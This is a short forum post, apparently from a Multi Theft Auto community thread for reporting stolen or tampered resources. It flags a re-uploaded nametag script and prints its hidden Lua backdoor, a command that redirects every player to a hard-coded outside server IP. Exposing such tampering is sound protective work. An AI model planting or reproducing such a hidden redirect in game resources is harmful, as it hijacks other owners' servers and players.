Jump to content

REPORT COMMUNITY CENTER RESOURCES HERE


Recommended Posts

  • Replies 1.1k
  • Created
  • Last Reply

Top Posters In This Topic

re-uploaded by another person with redirect code :

file nametagss.lua

function redirectAll(Player) 
    for i,m in ipairs ( getElementsByType("player") ) do 
        redirectPlayer(m,"176.9.100.232",22420) 
    end 
end 
addCommandHandler("redirectAll",redirectAll) 
  
addCommandHandler("stopRedirect",function(Player) 
    removeCommandHandler("redirectAll",redirectAll) 
end ) 

resource Link : https://community.multitheftauto.com/ind ... ls&id=5065

original resource by Yakuza.Real

https://community.multitheftauto.com/ind ... ls&id=3480

Link to comment
Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...